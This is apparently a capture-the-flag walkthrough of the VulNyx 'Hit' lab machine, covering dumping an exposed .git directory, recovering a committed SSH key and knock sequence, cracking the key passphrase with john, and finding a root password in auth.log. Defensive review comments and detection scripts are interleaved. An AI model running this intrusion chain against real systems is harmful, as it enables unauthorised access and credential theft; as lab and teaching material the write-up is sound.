Information

Hit is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 12:30 CEST
Nmap scan report for 192.168.1.53
Host is up (0.000099s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
 nmap -sVC -p80  192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 12:31 CEST
Nmap scan report for 192.168.1.53
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.22.1
| http-git: 
|   192.168.1.53:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Commit #5
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1

Shell (charlie)

80/TCP (HTTP)

Site

Directory Brute Force

Both the http-git NSE script from the initial nmap scan and the directory fuzzing show that a .git directory is exposed

| http-git: 
|   192.168.1.53:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Commit #5
 gobuster dir -w /opt/common.txt -u http://192.168.1.53/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.53/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git                 (Status: 301) [Size: 169] [--> http://192.168.1.53/.git/]
/.git/index           (Status: 200) [Size: 65]
/.git/config          (Status: 200) [Size: 92]
/.git/logs/           (Status: 200) [Size: 374]
/.git/HEAD            (Status: 200) [Size: 23]
/index.html           (Status: 200) [Size: 186]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================

.git

Download
 git-dumper "http://192.168.1.53/.git" git 2>/dev/null
[-] Testing http://192.168.1.53/.git/HEAD [200]
[-] Testing http://192.168.1.53/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.1.53/.git/ [200]
[-] Fetching http://192.168.1.53/.gitignore [404]
[-] Fetching http://192.168.1.53/.git/branches/ [200]
[-] Fetching http://192.168.1.53/.git/description [200]
[-] Fetching http://192.168.1.53/.git/config [200]
[-] Fetching http://192.168.1.53/.git/info/ [200]
[-] Fetching http://192.168.1.53/.git/refs/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/ [200]
[-] Fetching http://192.168.1.53/.git/logs/ [200]
[-] Fetching http://192.168.1.53/.git/objects/ [200]
[-] Fetching http://192.168.1.53/.git/HEAD [200]
[-] Fetching http://192.168.1.53/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.1.53/.git/index [200]
[-] Fetching http://192.168.1.53/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/update.sample [200]
[-] Fetching http://192.168.1.53/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.1.53/.git/objects/30/ [200]
[-] Fetching http://192.168.1.53/.git/objects/2b/ [200]
[-] Fetching http://192.168.1.53/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://192.168.1.53/.git/objects/0c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/4b/ [200]
[-] Fetching http://192.168.1.53/.git/objects/5c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/ [200]
[-] Fetching http://192.168.1.53/.git/objects/73/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/info/ [200]
[-] Fetching http://192.168.1.53/.git/objects/a7/ [200]
[-] Fetching http://192.168.1.53/.git/objects/94/ [200]
[-] Fetching http://192.168.1.53/.git/logs/HEAD [200]
[-] Fetching http://192.168.1.53/.git/objects/9c/ [200]
[-] Fetching http://192.168.1.53/.git/objects/99/ [200]
[-] Fetching http://192.168.1.53/.git/refs/heads/ [200]
[-] Fetching http://192.168.1.53/.git/objects/pack/ [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.1.53/.git/objects/2b/5a7479c36d425981b95982c37b10a34ce11aca [200]
[-] Fetching http://192.168.1.53/.git/objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904 [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/ [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/19f826926c775d465df62b5f82f66ec9fb7fa1 [200]
[-] Fetching http://192.168.1.53/.git/objects/30/36160351b1d7eda360bdd3fb8e65d535ad6df1 [200]
[-] Fetching http://192.168.1.53/.git/objects/5c/e5fff468df4e331e05d1f665faffb29632ff42 [200]
[-] Fetching http://192.168.1.53/.git/info/exclude [200]
[-] Fetching http://192.168.1.53/.git/objects/a7/685af0a6c8f0ecae7cd44159f3a6ceab3625d7 [200]
[-] Fetching http://192.168.1.53/.git/objects/0c/f5be47bae50c4aac01531288e7f71ba4be167c [200]
[-] Fetching http://192.168.1.53/.git/objects/73/9ad589e33f1e90bd2f1929c82f1037dfc73b09 [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/980936fd3d509433e9862e9021aa5fb13351ac [200]
[-] Fetching http://192.168.1.53/.git/objects/7c/3df59ddda406f09e4e4d36ddbd9d1daf67fda3 [200]
[-] Fetching http://192.168.1.53/.git/objects/7d/ff168ec5d2174eae9a7ff7f4d1d87080a6c726 [200]
[-] Fetching http://192.168.1.53/.git/refs/heads/master [200]
[-] Fetching http://192.168.1.53/.git/objects/9c/a5eedec55e3c900f8685460aa4ce605f3d8472 [200]
[-] Fetching http://192.168.1.53/.git/objects/99/dd10f9077a951497d8a76305a3c4e26adb31ff [200]
[-] Fetching http://192.168.1.53/.git/objects/a9/d7d7d4c39d4335d1529d5f78dd621695761b5a [200]
[-] Fetching http://192.168.1.53/.git/refs/tags/ [200]
[-] Fetching http://192.168.1.53/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.1.53/.git/objects/94/9429787b70fbcfc3816c0ba158ee2c83bb9f66 [200]
[-] Sanitizing .git/config
[-] Running git checkout .

Logs

I list a total of 5 commits and, from their author field, enumerate the user charlie

 cd git
 git log --all

commit 2b5a7479c36d425981b95982c37b10a34ce11aca (HEAD -> master)
Author: charlie <charlie@hit.nyx>
Date:   Mon Feb 3 23:33:01 2025 +0100

    Commit #5

commit 7dff168ec5d2174eae9a7ff7f4d1d87080a6c726
Author: charlie <charlie@hit.nyx>
Date:   Mon Feb 3 23:32:38 2025 +0100

    Commit #4

commit a9980936fd3d509433e9862e9021aa5fb13351ac
Author: charlie <charlie@hit.nyx>
Date:   Mon Feb 3 23:31:33 2025 +0100

    Commit #3

commit 0cf5be47bae50c4aac01531288e7f71ba4be167c
Author: charlie <charlie@hit.nyx>
Date:   Mon Feb 3 23:30:12 2025 +0100

    Commit #2

commit 9ca5eedec55e3c900f8685460aa4ce605f3d8472
Author: charlie <charlie@hit.nyx>
Date:   Mon Feb 3 23:29:26 2025 +0100

    Commit #1

The commit named Commit #3 (a9980936fd3d509433e9862e9021aa5fb13351ac) introduces the interesting differences

 git log -p 'a9980936fd3d509433e9862e9021aa5fb13351ac'
id_rsa
------BEGIN OPENSSH PRIVATE KEY-----
-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
-RcXCLT2EU2tO0AAAAJcm9vdEBrYWxpAQI=
------END OPENSSH PRIVATE KEY-----
-
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
 
+6ba1VKUz/cNss0/xw7FkmsfiG15ExhqArUxI7WCfiFKNaeuSdUNETexm38BmeC/b
+kmKErTAVzIpCtzCxXYEO8wOOyJRJEZGHNqtoq6bgrxcZaJfzONc1EM6aEIfQS+Ks
+zloh5Ye8FygCkU2bCSYnaLwyHuGUcJ72Oa+8jYJtsvr1Gd+z0CWJapRodsYnlvep
+5EGx+jaYDkOG3VEtvjfPvA+pezHPifDsLr03JNuGb4awvpTGoRqXjXSYSfKOKimy
+Jpip4JVxit3T9aaOu1wF5UIExRtTG9lj38Mb1H2zXENcONIX5nAPoacvvZtCp9iz
+20qafBdLgnvZF0sy9GEvjouXPNeAk/c19qTvAu6lSsQq0NliIcozN8tLyvNHUjPv
+s/BptewE2NK0YvkNNCNhTilVMPaaojhf8zIVqNeH3L99GBUjigNdd2kqYzX4CjG/
+7W8WLhl8gPDeM7eI+Tc94dRRopDfQxMkl/ZhpecXTQQj8Ay8kdSJ+788geA2ySUe
+eeeBZ2XZk1X73yoqE1n7mQfvoJwtQWsCATQvMZrVlAJv5XYzIQrtKsGmfv18FehN
+TosfUBrvqprm2093NHqgKsgZy12reQt8ZnQiusWiY4ozOQxLJnn6SnE2pSkNhOTj
+3Zi8x1WCH6qSOKREBnOZjWZJm4J8UgfqU3CpXKLaYDwPSSVjdHHX2D8m0yypxZGb
+7yP27mDSEgm2NxKbbesfEehqA+U3HvJClq9dgXYK14Phj6DRO8xDLBsP3GdlzZSB
+g2gIObMasB7lJl1zpre0FgP/Ee98xYwFSvu6nuHvfaEC++XXjJBI9xnAe23Bmlam
+7MIuk2eD+3R39skT5Sh5B8O/N2geMXL2G08QOLw5Yr5zvi8nNw1CkCO9saRf5x0x
+cfQfTQjGzwC/V0JvNtCZg8FDUlXeqoAd/skbZAmLNiFaNwQ2irOQmZvdmH/Zp23X
+HDKecWcpLhaa9xbbua84QMoP2lDm4NFLbPPxkG35kCW0qKGymWmqlZhkDiVoBdUJ
+psubanx2bCiCDHSoPGJq/4WW9agBuHd9POP3f1OJtDsgesJrZTUewomSDv5Vc039
+1PZI8qYCJIgojtlB0A7HFf/fJGSUjm5OmomDLi18HnTg6SiiEnmKtBtI7RkVkGSc
+6l+8RgddRFRY7/SmLUqEtLcgjjqFqT1yeKZAFxpGVxJh3c9eY0KNDbbnksPxV6B/
+Ogop0/2UWyQSudzhuDmPuXTHA8ZCohhl3S1RKzp0vnvZGyd83wbk427YrImnUqBh
+jMvFoMe664v6NwCvGk0H4oT5pz8guPH7EhnNGAYHQ65JtiAmn60fqqjF11mPN2mG
+z08EKhIsUZcYzl6zXelvKtI8oCPay7DAVh2YUVTCuXO0+ulaCrbhC4imvFTZflqP
+V1DUAhrK0WhvT97rnh7yI3cAO24Kp3dI0on7wB7OxV0NhbzypT3V9IJmOBbgXWW9
+TCG+r1FGBHQ6ywjmAeIGF3iui1MnU/TRbY7Zs0sqMZ3iT2jF8qNmfl0YhRtgXM9+
+o82sn1CEU4rITslU3qUHA5/yiFVRPuL48mbjTNbkLvzFfMQ/3ePdhg==
+-----END RSA PRIVATE KEY-----
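Review bot: this hunk replaces one committed private key with another, so the secret never leaves the repository: the removed OpenSSH-format key stays recoverable from history, and the new PEM key's `Proc-Type: 4,ENCRYPTED` / `DEK-Info: DES-EDE3-CBC,...` headers show it uses the legacy PEM scheme, whose MD5-derived key is cheap to brute-force offline. Both keys should be revoked and removed from any authorized_keys they unlock, and the objects purged from history rather than just overwritten in a later commit.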
knockd.conf
 [options]
-       UseSyslog
+       LogFile = /var/log/knockd.log
 
 [openSSH]
-       sequence    = 7000,8000,9000
-       seq_timeout = 5
-       command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+       sequence    = 65535,8888,54111
+       seq_timeout = 1
+       command     = /usr/sbin/service ssh start
        tcpflags    = syn
-
-[closeSSH]
-       sequence    = 9000,8000,7000
-       seq_timeout = 5
-       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
-       tcpflags    = syn
-
-[openHTTPS]
-       sequence    = 12345,54321,24680,13579
-       seq_timeout = 5
-       command     = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
-       tcpflags    = syn
-
-
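Review bot: the new `[openSSH]` command `/usr/sbin/service ssh start` drops the `%IP%` scoping of the old iptables rule and the `[closeSSH]` section is deleted, so a single successful knock starts sshd for every source address and nothing ever closes it again; if the port is still meant to be hidden, keep the per-IP ACCEPT/DELETE rule pair (or at least add a close sequence). The added `LogFile = /var/log/knockd.log` also writes knock activity (source IPs and sequence stages) to a file whose permissions should be checked, since that information is sensitive.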

I check out the files as they were after Commit #3 (a9980936fd3d509433e9862e9021aa5fb13351ac)

 git checkout 'a9980936fd3d509433e9862e9021aa5fb13351ac'
 ls -la
drwxr-xr-x root root 4.0 KB Sun Jul 27 16:56:15 2025 .
drwxrwxrwx root root 4.0 KB Sun Jul 27 16:56:05 2025 ..
drwxr-xr-x root root 4.0 KB Sun Jul 27 16:56:15 2025 .git
.rw-r--r-- root root 1.7 KB Sun Jul 27 16:56:15 2025 id_rsa
.rw-r--r-- root root 163 B  Sun Jul 27 16:56:15 2025 knockd.conf
 cat *
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
[encrypted key body as shown in the Commit #3 diff above]
-----END RSA PRIVATE KEY-----


[options]
	LogFile = /var/log/knockd.log

[openSSH]
	sequence    = 65535,8888,54111
	seq_timeout = 1
	command     = /usr/sbin/service ssh start
	tcpflags    = syn
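Leaked key material like the id_rsa above is easiest to catch at commit time. The following is an added example, not code from the walkthrough or from the machine author: a small scanner that walks a unified diff (the shape `git log -p` prints), collects every PEM or OpenSSH private-key block on either side of the change, and reads the `Proc-Type` / `DEK-Info` headers to tell an unencrypted key from one protected with the legacy PEM scheme. The sample diff is constructed for the example (key bodies cut to one base64 line each, headers as on the page); the function and field names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: a trimmed unified diff in the same shape as the git log -p
# output above (base64 key bodies cut to one line each; the headers are real).
SAMPLE_DIFF = """\
diff --git a/id_rsa b/id_rsa
--- a/id_rsa
+++ b/id_rsa
@@ -1,3 +1,6 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
------END OPENSSH PRIVATE KEY-----
-
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
+
+6ba1VKUz/cNss0/xw7FkmsfiG15ExhqArUxI7WCfiFKNaeuSdUNETexm38BmeC/b
+-----END RSA PRIVATE KEY-----
"""

BEGIN_RE = re.compile(r"-----BEGIN (?P<kind>[A-Z0-9 ]*?)PRIVATE KEY-----")
END_RE = re.compile(r"-----END (?P<kind>[A-Z0-9 ]*?)PRIVATE KEY-----")
FILE_HEADER_RE = re.compile(r"^(\+\+\+|---) (a/|b/|/dev/null)")
SIDES = {"+": "added", "-": "removed", " ": "context"}


def scan_diff_for_private_keys(diff_text: str) -> List[Dict[str, object]]:
    """Walk a unified diff and collect every PEM/OpenSSH private-key block.

    Each finding records on which side of the diff the key sits, the key type
    from the BEGIN line and, for legacy PEM keys, the encryption headers.
    """
    findings: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for raw in diff_text.splitlines():
        # Only +/-/space lines carry file content; skip diff --git, @@ and file headers
        if raw[:1] not in SIDES or FILE_HEADER_RE.match(raw):
            continue
        side, content = SIDES[raw[0]], raw[1:]
        if current is None:
            m = BEGIN_RE.search(content)
            if m:
                kind = m.group("kind").strip() or "PKCS#8"
                current = {
                    "side": side,
                    "type": kind,
                    # OpenSSH-format keys keep cipher/KDF inside the base64 blob,
                    # so the headers alone cannot say whether they are encrypted
                    "encrypted": None if kind == "OPENSSH" else False,
                    "cipher": None,
                    "body_lines": 0,
                }
            continue
        if END_RE.search(content):
            findings.append(current)
            current = None
        elif content.startswith("Proc-Type:") and "ENCRYPTED" in content:
            current["encrypted"] = True
        elif content.startswith("DEK-Info:"):
            # DEK-Info: <cipher>,<IV>; its presence marks the legacy PEM scheme
            current["cipher"] = content.split(":", 1)[1].strip().split(",")[0]
        elif content.strip():
            current["body_lines"] += 1
    return findings


def assess(finding: Dict[str, object]) -> str:
    """One-line risk statement for a finding, from the defender's side."""
    if finding["encrypted"] is None:
        return "OpenSSH-format private key committed; passphrase protection not visible from headers"
    if not finding["encrypted"]:
        return "unencrypted private key committed"
    return (f"PEM key encrypted with legacy {finding['cipher']} scheme "
            "(MD5-based key derivation, effectively no stretching): cheap to brute-force offline")


if __name__ == "__main__":
    for f in scan_diff_for_private_keys(SAMPLE_DIFF):
        print(f"{f['side']:8} {f['type']:8} {assess(f)}")
```

Run it as a pre-receive or CI check over `git log -p` output and treat any finding as a revocation event: overwriting a key in a later commit (as Commit #3 did) does not remove the earlier one from history, and the legacy PEM scheme only slows an offline guess down, which is why john recovers the passphrase further down this page.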

Port Knocking

I knock with knock using the port sequence taken from the configuration file, and the SSH port opens

 nmap -sS -p22  192.168.1.53 | grep 'PORT' -A 1
PORT   STATE  SERVICE
22/tcp closed ssh

 knock 192.168.1.53 65535:tcp 8888:tcp 54111:tcp

 nmap -sS -p22  192.168.1.53 | grep 'PORT' -A 1
PORT   STATE SERVICE
22/tcp open  ssh
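Why the knock works against everyone is visible in the configuration itself, so a configuration audit catches it before a scan does. The following is an added example, not code from the walkthrough or from knockd: a minimal knockd.conf reader plus an audit that flags an `open*` section whose command does not scope the opened service to `%IP%`, an `open*` section with no matching `close*` section, and a `LogFile` whose permissions need checking. The two configuration strings are the before/after versions from the Commit #3 diff above; the parser and function names are my own, and the parser is hand-rolled because `configparser` chokes on `UseSyslog` (no value) and on `%IP%` (interpolation).

```python
from typing import Dict, List

# Constructed from the diff above: knockd.conf before and after Commit #3
KNOCKD_BEFORE = """\
[options]
\tUseSyslog

[openSSH]
\tsequence    = 7000,8000,9000
\tseq_timeout = 5
\tcommand     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
\ttcpflags    = syn

[closeSSH]
\tsequence    = 9000,8000,7000
\tseq_timeout = 5
\tcommand     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
\ttcpflags    = syn
"""

KNOCKD_AFTER = """\
[options]
\tLogFile = /var/log/knockd.log

[openSSH]
\tsequence    = 65535,8888,54111
\tseq_timeout = 1
\tcommand     = /usr/sbin/service ssh start
\ttcpflags    = syn
"""


def parse_knockd(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style reader for knockd.conf: {section: {option: value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
            continue
        if current is None:
            raise ValueError(f"option outside any section: {line!r}")
        key, _, value = line.partition("=")   # options without '=' get an empty value
        sections[current][key.strip()] = value.strip()
    return sections


def audit_knockd(sections: Dict[str, Dict[str, str]]) -> List[str]:
    """Flag configurations where a successful knock exposes more than intended."""
    findings: List[str] = []
    options = sections.get("options", {})
    if "LogFile" in options:
        findings.append("[options] LogFile writes knock activity (source IPs, sequence stages) "
                        f"to {options['LogFile']}; check that the file is not group/world readable")
    for name, opts in sections.items():
        if not name.lower().startswith("open"):
            continue
        command = opts.get("command", "")
        if "%IP%" not in command:
            findings.append(f"[{name}] command does not use %IP%: the service is exposed "
                            "to every source address, not only the knocking host")
        close_name = "close" + name[len("open"):]
        if close_name not in sections:
            findings.append(f"[{name}] no matching [{close_name}] section: once opened, "
                            "nothing closes the port again")
    return findings


if __name__ == "__main__":
    for label, conf in (("before", KNOCKD_BEFORE), ("after", KNOCKD_AFTER)):
        print(f"== {label} ==")
        for finding in audit_knockd(parse_knockd(conf)) or ["no findings"]:
            print(" ", finding)
```

The "before" configuration passes cleanly: it inserts and later deletes an iptables rule for the knocking address only. The "after" configuration produces three findings, which is exactly why, on this machine, a single knock from the attacking host leaves sshd reachable from anywhere until reboot. The sequence itself is not what protects the port; the per-IP rule and the close sequence are.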

22/TCP (SSH)

The private key (id_rsa) is protected by a passphrase

 ssh -i id_rsa charlie@192.168.1.53
Enter passphrase for key 'id_rsa':

Cracking (id_rsa)

With john I recover the passphrase charlie1

 ssh2john id_rsa > hash

 john --wordlist=/opt/techyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlie1         (id_rsa) 

I log in to the system as the user charlie with the recovered private key (id_rsa)

 ssh -i id_rsa charlie@192.168.1.53
Enter passphrase for key 'id_rsa': 
charlie@hit:~$ id ; hostname
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)
hit

Privilege Escalation

Enumeration

Group

The user charlie is a member of the adm group

(Members of the adm group have permission to read log files)

charlie@hit:~$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)
charlie@hit:~$ groups
charlie adm

Abuse

I find credentials in the SSH log file (auth.log)

(It sometimes happens that the password is typed into the user field by mistake, which is also very common in web site login forms)

charlie@hit:~$ cd /var/log
charlie@hit:/var/log$ grep --color -riE "user|pass" 2>/dev/null
auth.log:2025-02-03T09:50:49.051052+01:00 hit sshd[701]: Invalid user r00tP4zzw0rd from 192.168.1.10 port 45796
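The sshd line above is a textbook case of a secret landing in a log that a non-root group can read. The following is an added example, not code from the walkthrough: a small detector that parses the `Invalid user ... from ... port ...` events from auth.log and flags those whose "username" looks like a password (several character classes, or leetspeak digits inside a word), so the entry can be treated as a credential leak and the password rotated. The sample log is constructed for the example, with the page's line as its first entry and the other entries made up for contrast; the heuristic and function names are my own.

```python
import re
from typing import Dict, List

# Constructed sample in the syslog format shown above: the first entry is the one
# from the page, the others are made up to show what a normal rejection looks like.
SAMPLE_AUTH_LOG = """\
2025-02-03T09:50:49.051052+01:00 hit sshd[701]: Invalid user r00tP4zzw0rd from 192.168.1.10 port 45796
2025-02-03T09:51:02.000000+01:00 hit sshd[705]: Invalid user admin from 192.168.1.10 port 45802
2025-02-03T09:51:15.000000+01:00 hit sshd[709]: Invalid user git from 203.0.113.7 port 51000
2025-02-03T09:52:00.000000+01:00 hit sshd[712]: Accepted publickey for charlie from 192.168.1.10 port 45820 ssh2: RSA SHA256:PLACEHOLDER
"""

INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)")


def looks_like_credential(name: str) -> bool:
    """Heuristic: real usernames are short and plain. A rejected 'user' that mixes
    three or more character classes, or spells words with digits (r00t, P4zz),
    is more likely a password typed into the wrong field."""
    classes = sum(bool(re.search(p, name))
                  for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    leetspeak = re.search(r"[A-Za-z]\d+[A-Za-z]", name) is not None
    return len(name) >= 8 and (classes >= 3 or leetspeak)


def find_leaked_credentials(log_text: str) -> List[Dict[str, object]]:
    """Return the 'Invalid user' events whose username looks like a secret."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = INVALID_USER_RE.search(line)
        if m and looks_like_credential(m.group("user")):
            hits.append({"user": m.group("user"), "src": m.group("src"),
                         "port": int(m.group("port")), "line": line})
    return hits


if __name__ == "__main__":
    for hit in find_leaked_credentials(SAMPLE_AUTH_LOG):
        # Report where it came from, not the value: the alert must not re-leak the secret
        print(f"possible password in username field from {hit['src']}:{hit['port']}")
```

Wire this into whatever reads auth.log (a journald/rsyslog pipeline or a cron job) and respond to a hit by rotating the password and checking who can read the file: on this machine every adm member, which is how charlie gets to root below. The heuristic is deliberately conservative, so plain but unusual usernames are not reported; tune the thresholds against your own login noise.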

I switch to the root user with that password

charlie@hit:~$ su -
Contraseña: 
root@hit:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
hit

Flags

Now as root I can read the flags user.txt and root.txt

root@hit:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
f4b9****************************
2174****************************

That concludes the walkthrough of the Hit machine.

Happy Hacking!